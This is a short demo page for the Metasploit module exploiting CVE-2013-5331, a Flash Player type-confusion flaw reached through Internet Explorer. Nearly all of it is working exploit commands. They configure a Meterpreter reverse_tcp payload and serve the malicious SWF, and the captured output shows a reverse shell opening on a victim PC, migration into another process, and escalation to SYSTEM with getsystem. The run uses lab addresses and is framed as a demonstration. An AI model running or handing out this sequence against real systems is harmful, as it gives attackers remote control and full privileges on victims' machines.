Metasploit CVE-2013-5331 Demo

Description:
This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170.

References:
http://helpx.adobe.com/security/products/flash-player/apsb13-28.html
http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html

*Commands are bold.

use exploit/windows/browser/adobe_flash_filters_type_confusion
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH 2013-5331
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit
[*] Exploit running as background job.
msf exploit(adobe_flash_filters_type_confusion) >
[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2013-5331
[*] Server started.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Gathering target information.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending response HTML.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Request: /2013-5331/GzqJRB/
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending HTML…
[*] 192.168.2.25 adobe_flash_filters_type_confusion – showme the money
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Request: /2013-5331/GzqJRB/jUBO.swf
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending SWF…
[*] Sending stage (769536 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:1096) at 2014-04-30 20:03:46 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:1096) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: iexplore.exe (2392)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2888
[+] Successfully migrated to process
sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM